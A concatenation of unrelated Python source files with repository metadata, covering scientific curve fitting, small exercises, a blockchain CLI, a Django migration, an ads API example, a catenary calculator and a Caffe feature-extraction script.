args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000) except Exception: return None return self.ssh_model def ssh_estimates(self, ssh_model): """ Get parameter estimtes from the model Parameters ---------- ssh_model : lmfit.MinimizerResult A successful model result Returns ------- final_estimates: dict Dictionary of final fitted parameters from the model """ self.final_estimates = self.ssh_model.params.valuesdict() return self.final_estimates def ssf_init_params(self, ssf_model): """ Get parameter estimtes from the model Parameters ---------- ssf_model : lmfit.MinimizerResult A successful model result Returns ------- initial_params: dict Dictionary of initial parameters supplied to the model """ self.initial_params = self.ssh_model.init_values return self.initial_params def ssf_aic(self, ssh_model): """ Get model AIC score Parameters ---------- ssf_model : lmfit.MinimizerResult A successful model result Returns ------- AIC: int AIC score from fitted model """ self.AIC = self.ssh_model.aic return self.AIC def __repr__(self): pass # readable representation of the object (for user) def __str__(self): pass class SharpeSchoolfieldlow(ThermalModels): model_name = "sharpeschoollow" def __init__(self, temps, traits, fit_pars): super().__init__(temps, traits, fit_pars) self.ssl_model = self.fit_ssh(temps, traits, fit_pars) if self.ssl_model is not None: # Return fitted trait values self.ssl_fits = self.ssl_fitted_vals(self.ssl_model) # Return parameter estimates from the model self.final_estimates = self.ssl_estimates(self.ssl_model) # Return initial parameter values supplied to the model self.initial_params = self.ssl_init_params(self.ssl_model) # Return AIC score self.AIC = self.ssh_aic(self.ssl_model) def ssl_fcn2min(self, temps, traits, fit_pars): """ Function to be minimized Parameters ---------- temps: numpy array Temperature array in Kelvin traits: numpy array Trait array params: lmfit.parameter.Parameters Dictionary of parameters to fit full schoolfield model Returns ------- ssl_fcn2min: callable Fitting function to be called by the optimizer - producing an array of residuals (difference between model and data) """ # Set parameter values B0 = self.fit_pars["B0"].value E = self.fit_pars["E"].value El = self.fit_pars["Eh"].value Tl = self.fit_pars["Th"].value model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps)))))) # Return residual array return np.array(np.exp(model) - self.traits) def ssf_fitted_vals(self, ssl_model): """ Called by a fit model only: A function to estimate the trait value at a given temperature. Parameters ---------- ssl_model: lmfit.MinimizerResult Minimizer result of a successful fit Returns ------- ssl_fits: numpy array Fitted trait values """ # Get best-fit model parameters B0 = self.ssh_model.params["B0"].value E = self.ssh_model.params["E"].value El = self.ssh_model.params["Eh"].value Tl = self.ssh_model.params["Th"].value # Define model model = np.log((B0 * np.exp(1)**((-E / self.k) * ((1 / self.temps) - (1 / self.Tref)))) / (1 + (np.exp(1)**((El / self.k) * ((1 / Tl) - (1 / self.temps)))))) # Get untransformed fitted values self.ssh_fits = np.array(np.exp(model)) return self.ssl_fits def fit_ssh(self, temps, traits, fit_pars): """ Fitting function for schoolfield full model Parameters ---------- fcn2min: callable function to be minimized by the optimizer params: Parameter object Dictionary of parameters to fit full schoolfield model temps: numpy array Temperature array in Kelvin traits: numpy array Trait array Returns ------- ssl_model: lmfit.MinimizerResult Model result object """ # Log trait values self.traits = np.log(self.traits) # Minimize model try: self.ssl_model = minimize(self.ssl_fcn2min, self.fit_pars, args=(self.temps, self.traits), xtol = 1e-12, ftol = 1e-12, maxfev = 100000) except Exception: return None return self.ssl_model def ssh_estimates(self, ssl_model): """ Get parameter estimtes from the model Parameters ---------- ssh_model : lmfit.MinimizerResult A successful model result Returns ------- final_estimates: dict Dictionary of final fitted parameters from the model """ self.final_estimates = self.ssl_model.params.valuesdict() return self.final_estimates def ssf_init_params(self, ssl_model): """ Get parameter estimtes from the model Parameters ---------- ssl_model : lmfit.MinimizerResult A successful model result Returns ------- initial_params: dict Dictionary of initial parameters supplied to the model """ self.initial_params = self.ssl_model.init_values return self.initial_params def ssf_aic(self, ssl_model): """ Get model AIC score Parameters ---------- ssl_model : lmfit.MinimizerResult A successful model result Returns ------- AIC: int AIC score from fitted model """ self.AIC = self.ssl_model.aic return self.AIC def __repr__(self): pass # readable representation of the object (for user) def __str__(self): pass
91f2e963910d164e1fa3ecf41f3875ae6dd1b8e6
4fc5c908df8c0aecb4943e798c9c71c542a96584
/samples/practice1_Milana.py
3d038dea120dcb17d2a350f9b410f72a73b176fa
[ "Apache-2.0" ]
permissive
Milana009/UNN_HPC_SCHOOL_2019_ML
84d51cdd7a499139a0297a76522350de74b7ff4c
d5bb7a8ab5f026f2bc4df896019ded5987040295
refs/heads/master
2020-09-13T07:58:32.456350
2019-11-19T23:04:02
2019-11-19T23:04:02
222,703,246
1
0
Apache-2.0
2019-11-19T13:31:23
2019-11-19T13:31:22
null
UTF-8
Python
false
false
1,157
py
import sys import cv2 import logging as log import argparse sys.path.append('../src') from imagefilter import ImageFilter def build_argparse(): parser=argparse.ArgumentParser() parser.add_argument('-i', '--input', help = 'your input', type = str) parser.add_argument('-w', '--width', help = 'your width', type = int) parser.add_argument('-l', '--height', help = 'your height', type = int) # # Add your code here # return parser def main(): log.basicConfig(format="[ %(levelname)s ] %(message)s", level=log.INFO, stream=sys.stdout) log.info("Hello image filtering") args = build_argparse().parse_args() imagePath = args.input log.info(imagePath) image_source = cv2.imread(imagePath, 1) log.info(image_source.shape) myFilter = ImageFilter(gray = True, shape = (args.width, args.height)) image_final = myFilter.process_image(image_source) cv2.imshow("Image", image_final) cv2.waitKey(0) cv2.destroyAllWindows() # # Add your code here # return if __name__ == '__main__': sys.exit(main())
[ "Milana_Vagapova" ]
Milana_Vagapova
3fccf4fa9600a4a3e7b07d4b28660e603bcef30e
781e2692049e87a4256320c76e82a19be257a05d
/all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py
18e84ab880631f7510539ae77e9524b0eda2b632
[]
no_license
itsolutionscorp/AutoStyle-Clustering
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
refs/heads/master
2020-12-11T07:27:19.291038
2016-03-16T03:18:00
2016-03-16T03:18:42
59,454,921
4
0
null
2016-05-23T05:40:56
2016-05-23T05:40:56
null
UTF-8
Python
false
false
621
py
# represents a triangle class Triangle(object): _kinds=["equilateral","isosceles","scalene"] def __init__(self,a,b,c): if a<=0 or b<=0 or c<=0: raise TriangleError("Triangles cannot have zero or negative side length.") if a+b<=c or a+c<=b or b+c<=a: raise TriangleError("Triangles must satisfy the triangle inequality.") self.sides=sorted([a,b,c]) def kind(self): return Triangle._kinds[len(set(self.sides))-1] # some sort of error was encountered when constructing a Triangle class TriangleError(Exception): def __init__(self,message): super(TriangleError,self).__init__(message)
748f97751e80a2258b78d59ce4a378db9a54d1b5
b743a6b89e3e7628963fd06d2928b8d1cdc3243c
/bpl_client/Client.py
c9143098c648f30df369d458d22b99d0e6d61a3a
[ "MIT" ]
permissive
DuneRoot/bpl-cli
847248d36449181856e6cf34a18119cd9fc1b045
3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28
refs/heads/master
2020-03-25T17:42:06.339501
2019-02-20T19:20:26
2019-02-20T19:20:26
143,990,801
3
0
null
null
null
null
UTF-8
Python
false
false
1,781
py
""" BPL Client Usage: bpl-cli network config new bpl-cli network config use bpl-cli network config show bpl-cli network peers bpl-cli network status bpl-cli account create bpl-cli account status <address> bpl-cli account transactions <address> bpl-cli account send <amount> <recipient> bpl-cli account vote <username> bpl-cli account delegate <username> bpl-cli message sign <message> bpl-cli message verify <message> <publicKey> Options: -h --help Show this screen. --version Show version. Help: For help using this client, please see https://github.com/DuneRoot/bpl-cli """ from importlib import import_module from functools import reduce from docopt import docopt import json from bpl_client.helpers.Constants import COMMANDS_JSON from bpl_client.helpers.Util import read_file from bpl_client import __version__ class Client: def __init__(self): """ Client Class. Retrieves options from docopt. Options are then filtered using data stored in commands.json. Command is then imported and instantiated. """ self._options = docopt(__doc__, version=__version__) self._arguments = { k: v for k, v in self._options.items() if not isinstance(v, bool) } commands_json = json.loads(read_file(COMMANDS_JSON)) command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0] getattr( import_module("bpl_client.commands.{0}".format(command["Module Identifier"])), command["Class Identifier"] )(self._arguments).run() def _is_command(self, conditions): return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
d115bee72cd6afec3acc95c9eb09d4221573f345
9abebf3d5b197a20a16829035e8d3623220c7822
/Chapter3/BigOListIndex.py
d355aab09621e3116e41f59a31b87c89427a2f5c
[]
no_license
JoeVentrella/CS260
61e4e834f6c767d80cfe1e19460168f707e15bcd
a717f4b476b6e80f25cd74c8effc343624ec9b42
refs/heads/master
2020-08-08T04:19:33.906563
2019-12-15T01:54:40
2019-12-15T01:54:40
213,710,821
0
0
null
2019-10-08T17:57:35
2019-10-08T17:42:15
null
UTF-8
Python
false
false
765
py
import random import timeit exampleList = list(range(10000)) num = 10000 def bigOForListIndex(exampleList, n): """ Experiment to verify list index is O(1) """ for i in range(num): index = random.randint(0, num-1) exampleList[index] def main(): for n in range(1000000, 10000001, 1000000): exampleList = list(range(n)) indexTime = timeit.Timer("bigOForListIndex(exampleList,"+str(n)+")", "from __main__ import exampleList,\ bigOForListIndex") it = indexTime.timeit(number=1) print ("Length of time for %d index access in %d list of"\ "numbers :%15.9f seconds" % (num, n, it)) if __name__ == '__main__': main()
7f7434016d940893c9cb3b72ea218d424554329e
ea416617fdf6632081cb91fccfb2e8fa5965ad9e
/plan/migrations/0002_route.py
f4cf7c2b4ef825c3680cda2b86819c90200f91f0
[]
no_license
fergalpowell/final_year_project
249f8289ab84b5daba98a9f262e1a2637760cd49
568e8cb646ccf5b6a25c1368ffd2204d7d5f08ab
refs/heads/master
2021-09-13T17:29:26.868935
2018-05-02T15:03:14
2018-05-02T15:03:14
112,532,473
1
0
null
null
null
null
UTF-8
Python
false
false
698
py
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2018-04-17 11:22 from __future__ import unicode_literals import django.contrib.gis.db.models.fields from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('plan', '0001_initial'), ] operations = [ migrations.CreateModel( name='Route', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('route', django.contrib.gis.db.models.fields.LineStringField(srid=4326)), ('name', models.CharField(max_length=250)), ], ), ]
8d311b4049baf3cfb4d2c9c41c06f410bd88211c
74e6ea749db5e989dcec9e85a6dadab44b73a91e
/restserver1/quickstart/svm.py
5aaf952eb9b89fe62df47c84fe7b73d10361507e
[]
no_license
torahss/restserver
94d373c31cc54aef32f3eeb24844c6c4af7be604
dadcb1c8c08b7af375bda3f9c2bca47a63a5b761
refs/heads/master
2023-02-02T12:48:38.672797
2020-12-21T12:50:16
2020-12-21T12:50:16
323,330,851
0
0
null
null
null
null
UTF-8
Python
false
false
1,228
py
from sklearn.svm import SVC from sklearn.metrics import accuracy_score from sklearn.model_selection import train_test_split import pandas as pd def svmRun(inputdata) : data = pd.read_csv('/var/www/restserver/quickstart/train.csv', header=0, index_col=0, squeeze=True) dataset = pd.DataFrame(data) t_data = pd.read_csv('/root/Downloads/test.csv', header=0, index_col=0, squeeze=True) t_data = pd.DataFrame(t_data) tr_y = dataset.iloc[:,4] tr_data = dataset.iloc[:, [0, 1, 2, 3]] test_y = t_data.iloc[:,4] t_data = t_data.iloc[:, [0, 1, 2, 3]] svm = SVC(kernel='rbf',C=1.0, random_state=1, gamma=0.1) svm.fit(tr_data,tr_y) #print(inputdata[0][1]) y_pre_test = svm.predict(t_data) t_data.iloc[1:2,0] = inputdata[0][0] t_data.iloc[1:2, 1] = inputdata[0][1] t_data.iloc[1:2, 2] = inputdata[0][2] t_data.iloc[1:2, 3] = inputdata[0][3] y_pred = svm.predict(t_data.iloc[1:2, ]) if y_pred[0] == 'Good' : result = 0 elif y_pred[0] == 'Normal' : result = 1 elif y_pred[0] == 'Bad': result = 2 elif y_pred[0] == 'Worst': result =3 print("Accuracy : %.2f" % accuracy_score(test_y, y_pre_test)) return result
431bab8eea3abbc7fae959c140647f6a74cb2440
a266cfe89cf9c7347abf712e3b800468438448c2
/extra_addons/formio_data_api/__manifest__.py
1449bd63251da49b08f0d9e19d5075ac17b82eaf
[]
no_license
cialuo/project_template
db8b9f9c4115a6d44363a39e311363e8f3e7807f
2f875bdc5b730afeae3dd8dffafde852d0a44936
refs/heads/main
2023-03-09T17:50:55.398557
2021-02-24T00:17:59
2021-02-24T00:17:59
null
0
0
null
null
null
null
UTF-8
Python
false
false
669
py
# Copyright Nova Code (http://www.novacode.nl) # See LICENSE file for full licensing details. { 'name': 'Forms | Data API', 'summary': 'Python API for Forms data (builder, form/submission).', 'version': '0.5', 'license': 'LGPL-3', 'author': 'Nova Code', 'website': 'https://www.novacode.nl', 'live_test_url': 'https://demo13.novacode.nl', 'category': 'Extra Tools', 'depends': ['formio'], 'data': [], 'external_dependencies': { 'python': ['formio-data'], }, 'application': False, 'images': [ 'static/description/banner.gif', ], 'description': """ Forms | Data API ================ """ }
aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9
7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a
/examples/adspygoogle/dfp/v201101/get_licas_by_statement.py
9086f2f5d7006a77c1a7b578138725bf4db3479b
[ "Apache-2.0" ]
permissive
hockeyprincess/google-api-dfp-python
534519695ffd26341204eedda7a8b50648f12ea9
efa82a8d85cbdc90f030db9d168790c55bd8b12a
refs/heads/master
2021-01-10T10:01:09.445419
2011-04-14T18:25:38
2011-04-14T18:25:38
52,676,942
0
0
null
null
null
null
UTF-8
Python
false
false
2,266
py
#!/usr/bin/python # # Copyright 2011 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """This code example gets all line item creative associations (LICA) for a given line item id. The statement retrieves up to the maximum page size limit of 500. To create LICAs, run create_licas.py.""" __author__ = '[email protected] (Stan Grinberg)' # Locate the client library. If module was installed via "setup.py" script, then # the following two lines are not needed. import os import sys sys.path.append(os.path.join('..', '..', '..', '..')) # Import appropriate classes from the client library. from adspygoogle.dfp.DfpClient import DfpClient # Initialize client object. client = DfpClient(path=os.path.join('..', '..', '..', '..')) # Initialize appropriate service. By default, the request is always made against # the sandbox environment. lica_service = client.GetLineItemCreativeAssociationService( 'https://sandbox.google.com', 'v201101') # Set the id of the line item to get LICAs by. line_item_id = 'INSERT_LINE_ITEM_ID_HERE' # Create statement object to only select LICAs for the given line item id. values = [{ 'key': 'lineItemId', 'value': { 'xsi_type': 'NumberValue', 'value': line_item_id } }] filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500', 'values': values} # Get LICAs by statement. licas = lica_service.GetLineItemCreativeAssociationsByStatement( filter_statement)[0]['results'] # Display results. for lica in licas: print ('LICA with line item id \'%s\', creative id \'%s\', and status ' '\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status'])) print print 'Number of results found: %s' % len(licas)
[ "api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138" ]
api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138
4327917009b231fd6cbcb15c547b3403e777d4b3
856762ba0c6c69f4b086689764fad0d019a50146
/图片颜色分割.py
9d7ada5b5d96e3196d6bf53313ed2f2350199158
[]
no_license
JonathanScoot/Events
bc9ec0194a972fe677693a1a8bff7539ff474bbf
795442eb56345b876847ce3c32ea4ea0631ddfb9
refs/heads/master
2020-04-30T13:37:13.664734
2019-03-21T03:33:32
2019-03-21T03:33:32
176,863,623
1
0
null
null
null
null
UTF-8
Python
false
false
234
py
import cv2 import numpy as np cap = cv2.imread('/Users/wangjie/Desktop/road1.jpg', 0) while True: displayimage = cv2.imshow('road', cap) k=cv2.waitKey(5) &0xFF if k==27: break cv2.destroyAllWindows() cv2.line()
11b5246e31e2f5ef8ad5e9bcb8fdfabe438a1953
6defd2219720396842ac564e7d6bf4f5146eddda
/pycatenary.py
0918a0110a0feec62435cf74110d084ab14fdc9e
[ "LicenseRef-scancode-warranty-disclaimer" ]
no_license
fsanges/pyCatenary-NoElast
2e111d379d36582b6b1851d4e4eb2bc004f4dc25
5901b06a208b802f12990ca0ecdce8c975c4a0e5
refs/heads/master
2021-12-01T20:55:56.685777
2013-04-01T11:46:34
2013-04-01T11:46:34
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,660
py
# !usr/bin/env python # catenary calculation, re-written in python - NO Elasticity!!! import math import numpy as np import matplotlib.pyplot as plt from scipy.optimize import fsolve from inout import write_file def cat(a): # defining catenary function #catenary eq (math): a*sinh(L/(2*a)+atanh(d/S))+a*sinh(L/(2*a)-atanh(d/S))-S=0 return a*math.sinh(L/(2*a))+math.atanh(d/S)+a*math.sinh(L/(2*a))-math.atanh(d/S)-S L=float(input("Horizontal Distance between supports [m]: ")) d=float(input ("Vertical Distance between supports [m]: ")) S=float(input("Length of cable [m] - must be greater than distance between supports: ")) w=float(input("Unit weight of cable [kg/m]: ")) za=float(input("Elevation of higher support from reference plane [m]: ")) #checking if cable length is bigger than total distance between supports distance=(L**2+d**2)**0.5 if S <= distance: print ("Length of cable must be greater than TOTAL distance between supports!") S=float(input("Length of cable [m]: ")) else: pass # solving catenary function for 'a' a=fsolve(cat, 1) # hor. distance between lowest catenary point (P) to higher support point (La) La=a*(L/(2*a)+math.atanh(d/S)) # hor. distance between lowest catenary point (P) to lower support point (Lb) Lb=L-La # vert. distance from higher support point to lowest point (P) in catenary (ha) ha=a*math.cosh(La/a)-a ## calculating reaction forces and angles # catenary lenght between support "A" (higher) and "P" - Sa Sa=a*math.sinh(La/a) # catenary lenght between support "B" )lower) and "P" - Sb Sb=a*math.sinh(Lb/a) # horizontal tension - constant through catenary: H H=w*a # vertical tension at "A" (Va) and "B" (Vb) Va=Sa*w Vb=Sb*w # tension at "A" (TA) and B (TB) TA=(H**2+Va**2)**0.5 TB=(H**2+Vb**2)**0.5 # inclination angles from vertical at "A" (ThetA) and B (ThetB) ThetA=math.atan(H/Va) ThetB=math.atan(H/Vb) ThetAd=ThetA*180/math.pi; ThetBd=ThetB*180/math.pi; # establishing A, B and P in coordinate system # index "a" corresponding to point "A", "b" to "B"-point and "P" to lowest caten. point zb=za-d zp=za-ha xa=La xp=0 xb=-Lb # writting results to file fname='catenary_res.txt' fn=open(fname, 'a') write_file(fn, "Horizontal Distance between supports in meters: ", round(L,3)) write_file(fn, "Catenary length in meters: ", round(S,3)) write_file(fn, "Vertical Distance Between supports in meters: ", round(d,3)) write_file(fn, "Unit Weight of Catenary line in kg/m: ", round(w,3)) write_file(fn, "Elevation of higher support (A) from reference plane in meters: ", round(za,3)) write_file(fn, "\Catenary coef.: ", round(a,5)) write_file(fn, "Horizontal tension in kg (constant along line: ", round(H,3)) write_file(fn, "Vertical tension in A in kg: ", round(Va,3)) write_file(fn, "Total tension in A in kg: ", round(TA,3)) write_file(fn, "Total tension in B in kg: ", round(TB,3)) write_file(fn, "Inclination angle from vertical at A in radians: ", round(ThetA,3)) write_file(fn, "Inclination angle from vertical at B in radians: ", round(ThetB,3)) write_file(fn, "Inclination angle from vertical at A in degrees: ", round(ThetAd,3)) write_file(fn, "Inclination angle from vertical at B in degrees: ", round(ThetBd,3)) fn.close() # graphing catenary curve - matplotlib & writting coordinates in file xinc=L/100 y=[] xc=[] fncoords="catenary_coords.txt" fn=open(fncoords, "a") for x in np.arange (xb, xa+xinc, xinc): ycal=a*math.cosh(x/a) fn.write("\n") fn.write(str(round(x,3))) fn.write("\t") fn.write(str(round(ycal[0],3))) y.append(ycal) xc.append(x) fn.close() # plotting, finally plt.plot(xc,y) plt.xlabel("X-distance [m]") plt.ylabel("Y-distance [m]") plt.grid() plt.show()
86404a656d1321585c146107b8e2b33929d19370
809f119d53610261d71c5e9b5f620c41524868b1
/main.py
eb0ecb4bd43e420c3f19ab15dbdcc22cd75d1cd5
[]
no_license
HackerulGogu/SnakeImpact
d07c9866ec8b4320c393b24fbd47793e0c03a140
c6c65f9e1de5cc446a56340ac0462cc4ed362b75
refs/heads/master
2021-04-11T04:19:15.420141
2020-03-21T14:51:55
2020-03-21T14:51:55
248,991,501
0
0
null
null
null
null
UTF-8
Python
false
false
15
py
print('merge')
7a01f23b1d83f8f97510a946715871ec8f1d5700
6d63fb09abb41f2c3f6ba66091b8c0507044104d
/py/liu.py
3d41ef1913f6c48a13f1ebb8c86ac5ac6a627c48
[]
no_license
buaaswf/backup-my-projects
dbc3d0c4ac5af38b4b8ce07be7978e3ff36cf75c
73577385da85fdd5899cb471220dd8334ca603bc
refs/heads/master
2021-04-15T03:44:06.248881
2018-03-22T08:58:36
2018-03-22T08:58:36
126,304,153
0
0
null
null
null
null
UTF-8
Python
false
false
16,242
py
#!/usr/bin/env python # encoding: utf-8 import numpy as np import sys from sklearn.metrics import classification_report sys.path.insert(0,"/home/s.li/2017/gpu4/caffe-segnet-cudnn5/python") import matplotlib.pyplot as plt import caffe import os import scipy.io import shutil from mnist_single_plot_roc import drawroc # Make sure that caffe is on the python path: from sklearn.metrics import confusion_matrix from tsne.tsne_1 import tsnepng def vis_square(resname, data, padsize=1, padval=0): data -= data.min() data /= data.max() # force the number of filters to be square n = int(np.ceil(np.sqrt(data.shape[0]))) padding = ((0, n ** 2 - data.shape[0]), (0, padsize), (0, padsize)) + ((0, 0),) * (data.ndim - 3) data = np.pad(data, padding, mode='constant', constant_values=(padval, padval)) # tile the filters into an image data = data.reshape((n, n) + data.shape[1:]).transpose((0, 2, 1, 3) + tuple(range(4, data.ndim + 1))) data = data.reshape((n * data.shape[1], n * data.shape[3]) + data.shape[4:]) plt.imsave(resname, data) def GetFileList(dir, fileList): newDir = dir if os.path.isfile(dir): fileList.append(dir.decode('gbk')) elif os.path.isdir(dir): for s in os.listdir(dir): #如果需要忽略某些文件夹,使用以下代码 if s.endswith(".txt") or s.endswith(".sh") or s.endswith(".py"): continue #if int(s)>998 and int(s) < 1000: newDir=os.path.join(dir,s) GetFileList(newDir, fileList) return fileList #dir = '/home/s.li/caffe0719/caffe-master/data/face/patch/casia1000/fullpathval.txt' def labelfile(dir): lines = [] with open (dir,'r') as f: lines = [line.strip().split(' ') for line in f ] #paths = [line[0] for line in lines] #labels = [line[1] for line in lines] # print lines return lines if len(sys.argv) != 4: print "Usage: python multifc.py inputimagedir feature.mat labeldir" # sys.exit() def loadmodel(caffepath='../',modelpath='models/casiaface/casia.caffemodel',deployroot='models/casiaface/casia_train_deploy.prototxt',meanroot='data/idface/casia_web.npy',shapelist=[64,3,100,100]): # caffe_root = caffepath # this file is expected to be in {caffe_root}/examples caffe_root = "/home/s.li/2017/gpu4/caffe-segnet-cudnn5/"# this file is expected to be in {caffe_root}/examples sys.path.insert(0, caffe_root + 'python') plt.rcParams['figure.figsize'] = (10, 10) plt.rcParams['image.interpolation'] = 'nearest' params = {'legend.fontsize':20} plt.rcParams.update(params) # plt.rcParams['image.cmap'] = 'gray' model =modelpath if not os.path.isfile(model): print("Downloading pre-trained CaffeNet model...") caffe.set_mode_cpu() net = caffe.Net(deployroot,model,caffe.TEST) # input preprocessing: 'data' is the name of the input blob == net.inputs[0] transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape}) transformer.set_transpose('data', (2, 0, 1)) # transformer.set_mean('data', np.load(caffe_root + meanroot).mean(1).mean(1)) # mean pixel blob = caffe.proto.caffe_pb2.BlobProto() data = open( meanroot , 'rb' ).read() blob.ParseFromString(data) arr = np.array( caffe.io.blobproto_to_array(blob) ) out = arr[0] transformer.set_mean('data', out.mean(1).mean(1)) # mean pixel transformer.set_raw_scale('data', 255) # the reference model operates on images in [0,255] range instead of [0,1] transformer.set_channel_swap('data', (2, 1, 0)) # the reference model has channels in BGR order instead of RGB # set net to batch size of 50 net.blobs['data'].reshape(shapelist[0], shapelist[1], shapelist[2], shapelist[3]) return net,transformer def image2mat(net,transformer,inputimagedir,outdir,labelfilepath,layername): #inputimagedir = sys.argv[1] mat = [] # lines = labelfile(labelfilepath) # print lines labels = [] pred = [] predroc= [] nn = 0 caffe.set_mode_gpu() allimages= GetFileList(inputimagedir, []) testimages =allimages # from random import shuffle import random # print allimages random.shuffle(testimages) errorimagelist="./error/mnist_result/"+outdir.split(".")[0] if not os.path.exists(errorimagelist): os.makedirs(errorimagelist) # print testimages for image in testimages: # print image, gtlabel = int(image.split("/")[-2]) # print gtlabel try: net.blobs['data'].data[...] = transformer.preprocess('data', caffe.io.load_image(image)) except Exception, e: print nn print str(e) nn += 1 continue out = net.forward() # pred.append(str(out['prob'].argmax())) # print (out['prob'].shape) # pred.append(out['prob'][1]) # print("image is {}Predicted class is #{}.".format(image,out['prob'].argmax())) if out['prob'].argmax()!=gtlabel: print out['prob'].argmax(),gtlabel shutil.copy(image,errorimagelist+"/"+image.split("/")[-1].split(".")[0]+"_pred_"+str(out['prob'].argmax())+".png") # caffe.set_mode_gpu() # caffe.set_device(0) #net.forward() # call once for allocation # %timeit net.forward() # feat = net.blobs[layername].data[1] feat = net.blobs[net.blobs.keys()[-2]].data[0] # for layer_name, param in net.params.iteritems(): # print layer_name + '\t' + str(param[0].data.shape), str(param[1].data.shape) # print net.blobs.keys() # filters = net.params['conv1'][0].data # print filters predroc.append(net.blobs[net.blobs.keys()[-1]].data[0].flatten()) pred.append(np.argmax(net.blobs[net.blobs.keys()[-1]].data[0].flatten())) # print "===>>",net.blobs[net.blobs.keys()[-1]].data[0].flatten() # pred.append(out['prob']) # print out['prob'] # print net.blobs[net.blobs.keys()[-2]].data[0] #np.savetxt(image+'feature.txt', feat.flat) #print type(feat.flat) featline = feat.flatten() # print featline #print type(featline) #featlinet= zip(*(featline)) mat.append(featline) label=image.split("/")[-2] # labels.append(str(lines[nn][1])) labels.append(int(label)) # print "===>>",out['prob'].argmax() # print "=====>>",lines[nn][1] if (nn%100==0): with open("./error/mnist_result/"+outdir,'w') as f: scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append nn += 1 # print pred.shape # tsnepng(mat,labels,"gootsne_"+outdir) print "tsnepng=========================>>>>" drawroc(labels,predroc,"./error/mnist_result/"+"zoomroc_10"+outdir.split('.')[0]+".png") print "roc=========================>>>>" print (classification_report(labels,pred)) text_file = open("./error/mnist_result/"+outdir.split('.')[0]+".txt", "w") text_file.write(outdir.split('.')[0]+" model\n") text_file.write(classification_report(labels,pred)) import pickle with open("./error/mnist_result/"+outdir.split('.')[0]+"_pred.pkl","wb") as f: pickle.dump(mat,f) with open("./error/mnist_result/"+outdir.split('.')[0]+"_true.pkl","wb") as f: pickle.dump(labels,f) with open("./error/mnist_result/"+outdir,'w') as f: scipy.io.savemat(f, {'data' :mat,'labels':labels}) #append cm=confusion_matrix(pred, labels) with open("./error/mnist_result/"+outdir.split(".")[0]+".pkl","wb") as f: pickle.dump(cm,f) print cm np.savetxt("./error/mnist_result/"+outdir.split(".")[0]+"mfse"+".csv", cm, delimiter=",") def batch_extrac_featuretomat(): #alexnet # alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/" # alexnetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_alex/" alexnetpath="/home/s.li/2016/caffe1128/caffe-master/models/" # googlenetpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar10_googlenet/" # cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/cifar10/cifar_cifar10/" # svhn_cifar10netpath="/home/swf/caffe/analysisfeatures/oversample/svhn/cifar10net/" # svhn_googlenetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/googlenet/" # svhn_alexnetpath="/home/swf/caffe/analysisfeatures/oversample/svhn/alexnet/" # googlenetpath+"bvlc_googlenet_iter_520000.caffemodel",\ # googlenetpath+"oribvlc_googlenet_iter_520000.caffemodel",\ # modelist=[alexnetpath+"oriciafr10caffe_alexnet_train_iter_390000.caffemodel",\ # alexnetpath+"dvnciafr10caffe_alexnet_train_iter_450000.caffemodel",\ # modelist=[alexnetpath + "cifar10gen_caffe_alexnet_train_iter_130000.caffemodel",\ # modelist =[alexnetpath + "cifar10balanced0_caffe_alexnet_train_iter_410000.caffemodel",\ # modelist =[alexnetpath + "7caffe_alexnet_train_iter_30000.caffemodel",\ # modelist =[alexnetpath + "0509dvn/caffe_alexnet_train_iter_120000.caffemodel",\ # modelist =[alexnetpath + "10caffe_alexnet_train_iter_10000.caffemodel",\ modelist =[alexnetpath + "mnist/mnist_data/result1/caffe_alexnet_train_iter_140000.caffemodel",\ alexnetpath + "mnist/mnist_data/result2/caffe_alexnet_train_iter_120000.caffemodel",\ #alexnetpath + "mnist/mnist_data/result3/caffe_alexnet_train_iter_120000.caffemodel",\ #alexnetpath + "mnist/mnist_data/result4/caffe_alexnet_train_iter_120000.caffemodel",\ alexnetpath + "mnist/mnist_data/result5/caffe_alexnet_train_iter_120000.caffemodel",\ alexnetpath + "mnist/mnist_data/result6/caffe_alexnet_train_iter_120000.caffemodel",\ alexnetpath + "mnist/mnist_data/result7/caffe_alexnet_train_iter_50000.caffemodel",\ #alexnetpath + "mnist/mnist_data/result8/caffe_alexnet_train_iter_60000.caffemodel",\ alexnetpath + "mnist/mnist_data/result9/caffe_alexnet_train_iter_110000.caffemodel",\ alexnetpath + "mnist/mnist_data/result10/caffe_alexnet_train_iter_50000.caffemodel",\ alexnetpath + "mnist/mnist_data/result11/caffe_alexnet_train_iter_50000.caffemodel",\ ] datalist=["/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", "/home/s.li/2017/gpu4/analysisfeatures/mnist_test/", 